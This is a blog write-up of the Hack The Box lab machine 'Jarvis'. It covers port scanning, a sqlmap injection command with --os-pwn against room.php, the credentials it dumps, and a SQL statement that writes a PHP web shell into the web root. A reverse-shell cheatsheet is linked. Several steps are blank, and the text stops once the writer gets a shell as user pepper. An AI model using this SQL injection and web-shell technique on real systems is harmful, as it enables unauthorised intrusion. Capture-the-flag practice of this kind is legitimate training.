Hack The Box Jarvis Writeup – 10.10.10.143

Hack The Box Jarvis Writeup - 10.10.10.143

Hack The Box Jarvis is based on the SQL injection vulnerability in the hotel room booking web application. WAF, SQL injection, systemctl, and SUID root are the keys to root this machine.

As like anyother machine I add the IP 10.10.10.143 as jarvis.htb to the etc/hosts

Lets start with nmap port scanning.

There are a couple of ports open: 22, 80 and 64999. The port 22 hosts an SSH, 80 an Apache httpd web server that runs our main target Hotel Room Booking Application and the port 64999 hosts another Apache server – this port seems to be banning whoever visits for 90 seconds.

PORT 80:

PORT: 64999

I started to enumerate the directories to find something useful using Dirbsuter. I found a lot of directories, I started analyzing them “one by one” until I decided to do an SQLi on the back-end SQL DB. Some users in the Jarvis forum posts say the room.php is the SQLi point, so I start the start the SQLMAP.

The SQLi is confirmed from the above scan. I know know that the following SQLi are possible on this machine.

Possible SQLi as per sqlmap scan report:

sqlmap command: sqlmap -u http://jarvis.htb/room.php?cod=1 -p cod –delay 2 –random-agent –os-pwn

I’m going to use –os-pwn option in the sqlmap, this will give me the shell directly.

I actually found another easy way to get the shell using --passwords option to dump the users password hashes from the database.

So I now have the user DBadmin and his password imissyou I can now use these credentials to login to phpmyadmin .

Now I’m going to try using the SQL console to get a web shell

SELECT "<?php system($_GET['c']); ?>" into outfile "/var/www/html/sh3ll.php"

I’m going to use the OpenBSD Shell from PayloadsAllTheThings to get the reverse shell

Link: https://github.com/swisskyrepo/PayloadsAllTheThings/blob/master/Methodology%20and%20Resources/Reverse%20Shell%20Cheatsheet.md#netcat-openbsd

Command:

Before running the command, I opened another terminal and ran the netcat.

User.txt

I found the user.txt in the home directory, however I wasnt able to read it as www-data has no rights to open it. I noticed there is a user pepper will be able to do this job

The simpler.py:

The next step was to run the script

I now have the shell as “pepper”

Navin

Hey there, I'm Navin, a passionate Info-Sec enthusiast from Bahrain. I started this blog to share my knowledge. I usually write on HackTheBox machines and challenges, cybersecurity-related articles and bug-bounty. If you are an HTB user and like my articles, please respect here: https://www.hackthebox.eu/home/users/profile/68523

View all posts by Navin →

Leave a Reply

Leave a Reply

  Subscribe  
Notify of

You cannot copy content of this page

%d bloggers like this: